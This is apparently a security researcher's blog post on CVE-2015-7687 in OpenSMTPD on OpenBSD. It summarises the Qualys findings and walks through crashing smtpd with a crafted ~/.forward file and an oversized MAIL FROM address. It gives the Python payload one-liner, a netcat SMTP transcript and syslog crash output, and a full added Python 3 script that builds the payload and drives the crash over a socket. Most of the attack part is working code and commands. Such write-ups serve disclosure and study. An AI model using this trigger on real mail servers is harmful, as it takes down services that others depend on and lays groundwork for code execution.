
CVE-2015-7687 OpenSMTPd trigger on OpenBSD

The asciinema recording below shows the overflow reported in OpenSMTPD in 2015 (http://seclists.org/oss-sec/2015/q4/17) being triggered through a user's .forward file.

The Qualys report is worth reading in full, as it covers several reported vulnerabilities; the most interesting ones are the following:

  • A version of fgetln() that allows attackers to read and write out-of-bounds memory
  • A stack-based buffer overflow that allows local users to crash OpenSMTPD, or execute arbitrary code as the non-chrooted _smtpd user
  • A hardlink attack that allows local users to read the first line of arbitrary files (for example, root’s hash from /etc/master.passwd)
  • An out-of-bounds memory read that allows remote attackers to crash OpenSMTPD, or leak information and defeat the ASLR protection
  • A use-after-free vulnerability that allows remote attackers to crash OpenSMTPD, or execute arbitrary code as the non-chrooted _smtpd user
  • Multiple inter-process vulnerabilities that allow attackers to escalate from one (already-compromised) OpenSMTPD process to another

To trigger the issue, a user needs to set up a mail forwarding rule. At user level, OpenSMTPD reads forwarding rules from a .forward file in the user's home directory.

  1. Log in via SSH/tty using a regular user account
  2. Set up the mail forward using ~/.forward. The one-liner below (Python 2 print statement) writes 1014 slashes followed by the %{sender} expansion token, which smtpd replaces with the MAIL FROM address when the rule is expanded:
     $ python -c 'print "/" * 1014 + "%{sender}"' > ~/.forward
  3. Connect to smtpd using netcat (or telnet, or whatever)
  4. Issue the sequence: “HELO 127.0.0.1” (EHLO works as well, as in the transcript below), “MAIL FROM:<`255xA`@`255xA`>” (255 A characters as local part and 255 as domain) and a “RCPT TO:” naming the account whose ~/.forward holds the rule

The following shows a console log excerpt triggering the issue on a local OpenBSD mail server.

$ nc -v 127.0.0.1 25
Connection to 127.0.0.1 25 port [tcp/smtp] succeeded!
220 mail.prod.libcrack.so ESMTP OpenSMTPD
EHLO 127.0.0.1
250-mail.prod.libcrack.so Hello 127.0.0.1 [127.0.0.1], pleased to meet you
250-8BITMIME
250-ENHANCEDSTATUSCODES
250-SIZE 52428800
250-DSN
250 HELP
MAIL FROM:
250 2.0.0: Ok
RCPT TO:

smtpd dies after the final “RCPT TO” command. This can be seen by inspecting the system logs, where the lka process (the one expanding the .forward rule) goes away and every peer process reports its pipe closed:

Oct 5 11:50:15 mail smtpd[2731]: warn: format string error while expanding for user user
Oct 5 11:50:15 mail smtpd[25366]: warn: parent -> lka: pipe closed
Oct 5 11:50:15 mail smtpd[12226]: warn: pony -> lka: pipe closed
Oct 5 11:50:15 mail smtpd[4936]: warn: ca -> parent: pipe closed
Oct 5 11:50:15 mail smtpd[14187]: warn: queue -> lka: pipe closed
Oct 5 11:50:15 mail smtpd[17735]: warn: scheduler -> queue: pipe closed
Oct 5 11:50:15 mail smtpd[1602]: warn: control -> lka: pipe closed
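The trigger above as a Python 3 script. This is an added example, not code from the original post or from the OpenSMTPD project: it builds the .forward payload and the MAIL FROM address from the post's values (1014 slashes, 255 A characters per address part), replays the three commands over a raw socket so the bytes on the wire are exactly those in the transcript, and parses SMTP replies so that a missing or reset reply after RCPT TO is recorded as the crash indicator. The recipient user@localhost is an assumption (the syslog line only says "expanding for user user"); the .forward file still has to be written on the target as in step 2.

```python
#!/usr/bin/env python3
"""Trigger driver for the .forward / %{sender} expansion crash described above.

Added example, not code from the original post or from the OpenSMTPD project.
Assumptions: the account owning ~/.forward is "user" on the local host (the
syslog line reads "expanding for user user"), so TARGET_RCPT is a guess; the
1014 and 255 lengths are the values the post uses.
"""
import io
import socket
import sys

FORWARD_PREFIX_LEN = 1014        # run of '/' from the post's Python 2 one-liner
SENDER_PART_LEN = 255            # step 4: 255 x 'A' as local part and as domain
TARGET_RCPT = "user@localhost"   # assumption: recipient whose ~/.forward holds the rule


def forward_payload(prefix_len=FORWARD_PREFIX_LEN):
    """Content of ~/.forward: slashes followed by the %{sender} expansion token.

    Same bytes as `python -c 'print "/" * 1014 + "%{sender}"'`, whose print
    statement appends the trailing newline."""
    return "/" * prefix_len + "%{sender}\n"


def sender_address(part_len=SENDER_PART_LEN):
    """MAIL FROM address from step 4: 255 'A's, '@', 255 'A's."""
    return "A" * part_len + "@" + "A" * part_len


def expanded_line_length(prefix_len=FORWARD_PREFIX_LEN, part_len=SENDER_PART_LEN):
    """Length of the .forward line once %{sender} is replaced by the MAIL FROM
    address: 1014 + 511 = 1525 characters, against 1023 on disk. The 9-byte
    token grows by 502 bytes, which is what the overflow relies on."""
    return prefix_len + len(sender_address(part_len))


def smtp_commands(rcpt=TARGET_RCPT):
    """The command sequence from the transcript (EHLO is what the log shows)."""
    return [
        "EHLO 127.0.0.1",
        "MAIL FROM:<%s>" % sender_address(),
        "RCPT TO:<%s>" % rcpt,
    ]


def read_reply(rfile):
    """Read one SMTP reply, multi-line replies included (RFC 5321: 'NNN-text'
    continues, 'NNN text' ends). Returns (code, lines); code is None when the
    peer closed the connection, which is what happens once lka has died."""
    lines = []
    while True:
        raw = rfile.readline()
        if not raw:                      # EOF: server went away
            return None, lines
        line = raw.decode("ascii", "replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] == " ":
            code = int(line[:3]) if line[:3].isdigit() else None
            return code, lines


def parse_transcript(data):
    """Split a captured server-side byte stream into its replies (offline helper)."""
    rfile = io.BytesIO(data)
    replies = []
    while True:
        code, lines = read_reply(rfile)
        if not lines:
            return replies
        replies.append((code, lines))


def send_trigger(host="127.0.0.1", port=25, rcpt=TARGET_RCPT, timeout=5.0):
    """Connect, replay the commands, and record the reply to each. After RCPT TO
    the reply either never arrives (timeout) or the socket is reset: both are
    recorded as code None, the observable sign that the daemon crashed."""
    results = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("rb")
        results.append(("<banner>", read_reply(rfile)))
        for cmd in smtp_commands(rcpt):
            sock.sendall((cmd + "\r\n").encode("ascii"))
            try:
                results.append((cmd, read_reply(rfile)))
            except (socket.timeout, ConnectionResetError, BrokenPipeError):
                results.append((cmd, (None, [])))
                break
    return results


if __name__ == "__main__":
    # Usage: python3 trigger.py [host] [rcpt]; writing ~/.forward is left to step 2.
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    rcpt = sys.argv[2] if len(sys.argv) > 2 else TARGET_RCPT
    for cmd, (code, _lines) in send_trigger(host, rcpt=rcpt):
        print("%-60.60s -> %s" % (cmd, code if code is not None else "no reply"))
```

parse_transcript() exists so the reply parser can be checked against the console excerpt above without a live server; on a real target, the last entry returned by send_trigger() carries code None exactly when the syslog shows the "pipe closed" cascade.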

The asciinema recording below shows the exploitation of this issue.

I’ll write a post about the exploitation details as soon as I have some spare time 🙂

Published in: vulnerability